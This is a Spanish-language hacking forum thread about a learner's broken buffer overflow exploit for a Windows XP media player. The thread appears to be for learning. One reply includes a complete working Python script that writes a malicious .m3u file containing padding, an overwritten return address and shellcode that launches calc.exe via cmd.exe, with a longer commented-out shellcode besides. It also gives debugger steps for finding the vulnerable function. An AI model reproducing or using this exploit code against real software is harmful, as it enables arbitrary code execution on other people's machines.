problemas con las DLL en el exploit

Iniciado por Schwarzschild, 25 Febrero 2013, 05:45 AM

0 Miembros y 1 Visitante están viendo este tema.

Schwarzschild

Buenas les queria contar q estoy aprendiendo a crear exploit y me puse a leer los tutos de coleran(este es el tuto http://www.mediafire.com/?4fxv630j8k8yfa1) este es el exploit en el q estoy trabajando http://www.exploit-db.com/exploits/10374/, pasa lo sig arme el exploit como dice el tutorial,cuando lo arme funcionaba buscando jmp esp en una dll me ejecutaba la shell code pero dsp de unos dias ya no me la ejecutaba mas, ahora nomas me la deja ejecutar manualmente(sobrescribiendo eip y poniendo la direccion donde se aloja la shellcode de retorno),estoy trabajando en win xP sp1,busco una dll con un salto a esp pero no funciona,tamb intente con pop pop ret y tampoco.alguien que sepa del tema me podria guiar masomenos?si no entendieron algo de lo q escribi diganme jeje perdon si no me exprese bien
desde ya muchas gracias
Wenn Sie andere Ergebnisse wollen, nicht das gleiche tun.

Das Geheimnis ist das Schönste, was wir erleben können. Ist die Quelle aller wahren Kunst und Wissenschaft.

Albert Einstein ;)

Schwarzschild

Wenn Sie andere Ergebnisse wollen, nicht das gleiche tun.

Das Geheimnis ist das Schönste, was wir erleben können. Ist die Quelle aller wahren Kunst und Wissenschaft.

Albert Einstein ;)

Schwarzschild

Wenn Sie andere Ergebnisse wollen, nicht das gleiche tun.

Das Geheimnis ist das Schönste, was wir erleben können. Ist die Quelle aller wahren Kunst und Wissenschaft.

Albert Einstein ;)

MCKSys Argentina

#3
OK, me bajé el programa y lo estuve mirando. Aparte, bajé el video y también lo miré.

Aunque no tengo el tutorial que estás siguiendo, te puedo dar la siguiente info:

La función vulnerable es la que comienza en 41E2B0. Usa Olly y ponle un BP ahí. Cuando pare, vas poder ver la dirección de retorno de la función en el stack. Esa es la dirección que se va a pisar.

Ahora, si pones un BP al final de la función (en 41E9EC) vas a ver el valor al cual está intentando retornar y así vas a poder ver porqué se está rompiendo tu exploit.

Ahora, hice pruebas en XP SP3 EN y el siguiente exploit anda bien (en python):

Código (python) [Seleccionar]

import os
import struct

def main():
   file1 = "exploit.m3u"
   junk = "\x41" * 26099
   eip= struct.pack('<L', 0x01cef23a)
   shellcode = "\x90" * 25
   shellcode += "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65\x78\x65"
   #shellcode += "\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66\xf3\x07"
   shellcode += "\x90" * 25
   f = open(file1, "wb")
   f.write(junk + eip + shellcode)
   f.close()
   print("exploit created successfully");

if __name__ == '__main__':
   main()


Fíjate que hay algunos cambios en los valores originales (en junk). El shellcode que estás usando está comentado porque no me funciona en este SO, pero he agregado uno que debería funcionar bien.

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


Иōҳ

Joder, no solo en el subforo de ing. inversa, si no también aquí, xD, parece que juntarte con tantos ew ya te está volviendo uno :P, por cierto ya eres ew? (tú me entiendes xd).

Nox.
Eres adicto a la Ing. Inversa? -> www.noxsoft.net

MCKSys Argentina

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


Falso Positivo

Cita de: Schwarzschild en 25 Febrero 2013, 05:45 AM
Buenas les queria contar q estoy aprendiendo a crear exploit y me puse a leer los tutos de coleran(este es el tuto http://www.mediafire.com/?4fxv630j8k8yfa1) este es el exploit en el q estoy trabajando http://www.exploit-db.com/exploits/10374/, pasa lo sig arme el exploit como dice el tutorial,cuando lo arme funcionaba buscando jmp esp en una dll me ejecutaba la shell code pero dsp de unos dias ya no me la ejecutaba mas, ahora nomas me la deja ejecutar manualmente(sobrescribiendo eip y poniendo la direccion donde se aloja la shellcode de retorno),estoy trabajando en win xP sp1,busco una dll con un salto a esp pero no funciona,tamb intente con pop pop ret y tampoco.alguien que sepa del tema me podria guiar masomenos?si no entendieron algo de lo q escribi diganme jeje perdon si no me exprese bien
desde ya muchas gracias

si bien no tengo tiempo en este momento para reveer todo, recomiendo deshabilitar windows update ya que es posible que el exploit te dejo de funcionar debido a que el xp se actualizó, el payload cambiara entre sp y sp, también puede o no cambiar entre idiomas...quizá no sea éste el caso pero es bueno que lo sepas si estás iniciandote.
Don't worry, be hacked....